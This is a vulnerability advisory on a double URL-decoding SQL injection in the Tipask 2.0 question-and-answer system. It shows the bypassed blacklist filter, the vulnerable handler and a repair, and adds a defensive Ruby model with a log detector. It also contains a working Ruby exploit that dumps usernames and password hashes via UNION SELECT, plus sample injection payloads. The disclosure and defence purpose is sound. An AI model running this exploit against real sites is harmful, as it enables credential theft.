Tipask quiz system 2.0 ajaxsearch secondary encoding injection vulnerability and fix - vulnerability warning - the black bar safety net

2013-09-11T00:00:00
ID MYHACK58:62201340519
Type myhack58
Reporter seay
Modified 2013-09-11T00:00:00

Description

Tipask quiz system is an open-source PHP question-and-answer program modelled on Baidu Zhidao. It is designed around Chinese usage habits and built on an MVC framework, and is fast, SEO-friendly and has a clean, clear interface.

But Tipask has a secondary encoding (double URL decoding) problem that lets an attacker bypass its filtering system, which leads to SQL injection.

At the program entry point, init_request() in /model/tipask.class.php:

$this->get  = taddslashes($this->get, 1);
$this->post = taddslashes(array_merge($_GET, $_POST));
checkattack($this->post, 'post');
checkattack($this->get, 'get');

The GET and POST parameters are first passed through addslashes and then through a checkattack check:

function checkattack($reqarr, $reqtype = 'post') {
    // one blacklist regex per request source; each is used with the /is modifiers
    $filtertable = array(
        'get'    => '\'|(and|or)\b.+?(>|<|=|in|like)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)',
        'post'   => '\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)',
        'cookie' => '\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)'
    );
    foreach ($reqarr as $reqkey => $reqvalue) {
        if (preg_match("/" . $filtertable[$reqtype] . "/is", $reqvalue) == 1) {
            print('Illegal operation!');
            exit(-1);
        }
    }
}

This check is aimed mainly at SQL injection: as soon as one of the rules matches, the script prints "Illegal operation!" and exits.

Now look at the vulnerable spot, the onajaxsearch function in /control/question.php:

/* Question auto-search for already-solved questions */
function onajaxsearch() {
    $title = urldecode($this->get[2]);   // second decode, after the entry checks have run
    $questionlist = $_ENV['question']->search_title($title, 2, 1, 0, 5);
    include template('ajaxsearch');
}

The second GET parameter is passed through urldecode and then straight into the SQL statement. Because the addslashes and checkattack steps ran on the still-encoded value, an encoded payload slips past the front filtering and checks and leads to SQL injection.

require "net/http"
require "uri"

def urlencode(exp)
  str = ""
  exp.each_char { |c| str << sprintf("%%%x", c.ord) }
  return str
end

def request(method, url)
  if method.eql?("get")
    uri = URI.parse(url)
    http = Net::HTTP.new(uri.host, uri.port)
    response = http.request(Net::HTTP::Get.new(uri.request_uri))
    return response
  end
end

doc =<<HERE
-------------------------------------------------------
Tipask 2.0 Injection Exploit
Author:ztz
Blog:http://ztz.fuzzexp.org/
-------------------------------------------------------
HERE

usage =<<HERE
Usage: ruby #{$0} host port path
example: ruby #{$0} help.tipask.com 80 /
HERE

puts doc
if ARGV.length < 3
  puts usage
else
  $host = ARGV[0]
  $port = ARGV[1]
  $path = ARGV[2]
  puts "[*]send request..."
  url = "http://#{$host}:#{$port}#{$path}?question/ajaxsearch/"
  exp = urlencode("' UNION SELECT 1,2,3,4,5,6,7,8,concat(username,char(0x3d),password),10,11,12,13,14,15,16,17,18,19,20,21 from ask_user#")
  response = request('get', url << exp)
  result = response.body.scan(/\w+=\w{32}/)
  puts result
end


Repair solution:

function onajaxsearch() {
    $title = $this->get[2];   // use the value the entry filter inspected; no second decode
    $questionlist = $_ENV['question']->search_title($title, 2, 1, 0, 5);
    include template('ajaxsearch');
}
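As an added example (written for this page, not code from Tipask or from the advisory's author), the Ruby script below models the request path described above: the taddslashes() and checkattack() steps from init_request(), the onajaxsearch() handler as it was in 2.0 and as repaired, and a decode-before-check variant for handlers that genuinely need decoded input. It ends with a small detector that replays the same decode over access-log lines and flags requests whose decoded ajaxsearch parameter the entry filter would have rejected. Only the 'get' rule of checkattack() is reproduced; addslashes() and urldecode() are emulated in a few lines; the log lines, addresses and payloads are constructed for the demo.

```ruby
require "uri" # only for URI.encode_www_form_component in the stand-alone demo

# Added example, not Tipask's code: the 'get' rule of checkattack(), copied
# from the PHP single-quoted string into a Ruby single-quoted string so the
# backslashes survive intact. Only this rule matters, because the vulnerable
# value is $this->get[2].
CHECKATTACK_GET = Regexp.new(
  '\'|(and|or)\b.+?(>|<|=|in|like)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|' \
  'UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|' \
  '(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)',
  Regexp::IGNORECASE | Regexp::MULTILINE # PHP's /is modifiers
)

# taddslashes() reduced to PHP addslashes(): backslash-escape ' " \ and NUL.
def taddslashes(value)
  value.gsub(/(['"\\\x00])/) { "\\#{$1}" }
end

# checkattack(): true when the 'get' rule fires on the value.
def checkattack_blocks?(value)
  CHECKATTACK_GET.match?(value)
end

# PHP urldecode() emulation: '+' becomes a space and %XX becomes byte XX.
# Lenient like PHP: malformed sequences are left as they are.
def php_urldecode(value)
  value.tr("+", " ").gsub(/%([0-9a-fA-F]{2})/) { $1.hex.chr }
end

# Tipask 2.0 order of operations: escape, check, and only then decode.
# Returns the string that reaches search_title(), or :blocked.
def vulnerable_onajaxsearch(raw)
  value = taddslashes(raw)
  return :blocked if checkattack_blocks?(value)
  php_urldecode(value)
end

# The repair from the page: the second decode is gone, so the query sees
# exactly the value the entry filter inspected.
def repaired_onajaxsearch(raw)
  value = taddslashes(raw)
  return :blocked if checkattack_blocks?(value)
  value
end

# If a handler truly needs decoded input, canonicalise before validating:
# decode first, then escape and check the decoded form.
def decode_then_check(raw)
  value = taddslashes(php_urldecode(raw))
  return :blocked if checkattack_blocks?(value)
  value
end

# Detection over access logs: take the third segment of
# ?question/ajaxsearch/<value>, decode it as the handler did, and flag the
# request when the decoded form is something the entry filter would reject.
AJAXSEARCH_REQUEST = %r{"GET [^"]*\?question/ajaxsearch/([^ "]+) HTTP/[\d.]+"}

def flag_ajaxsearch_bypass(log_lines)
  log_lines.each_with_object([]) do |line, hits|
    m = AJAXSEARCH_REQUEST.match(line)
    next unless m
    decoded = php_urldecode(m[1])
    hits << [line.split(" ", 2).first, decoded] if checkattack_blocks?(decoded)
  end
end

# Constructed access-log lines (Apache combined format); addresses are from
# the documentation ranges and every request here is made up for the demo.
SAMPLE_LOG = [
  '203.0.113.5 - - [11/Sep/2013:10:00:01 +0800] "GET /?question/ajaxsearch/how%20to%20install HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [11/Sep/2013:10:00:07 +0800] "GET /?question/ajaxsearch/%27+or+1%3D1 HTTP/1.1" 200 9031 "-" "Mozilla/5.0"',
  '198.51.100.23 - - [11/Sep/2013:10:00:09 +0800] "GET /?question/ajaxsearch/%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31 HTTP/1.1" 200 9120 "-" "Ruby"',
  '203.0.113.5 - - [11/Sep/2013:10:00:12 +0800] "GET /?question/view/42 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"'
].freeze

if __FILE__ == $0
  plain = "' or 1=1"
  encoded = URI.encode_www_form_component(plain) # "%27+or+1%3D1"
  puts "raw value, 2.0        -> #{vulnerable_onajaxsearch(plain).inspect}"
  puts "encoded value, 2.0    -> #{vulnerable_onajaxsearch(encoded).inspect}"
  puts "encoded value, repair -> #{repaired_onajaxsearch(encoded).inspect}"
  puts "decode, then check    -> #{decode_then_check(encoded).inspect}"
  flag_ajaxsearch_bypass(SAMPLE_LOG).each { |ip, v| puts "flagged #{ip}: #{v}" }
end
```

Run stand-alone, the script shows the raw quote being blocked, the same value percent-encoded reaching the query under the 2.0 ordering, the repair passing only the still-encoded text on, and decoding before the check blocking it again; the detector flags the two encoded requests and leaves the ordinary search alone. The point is ordering: validation has to see the same canonical form the consumer sees, so any decoding belongs before the filter, never after it.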

Author: pig child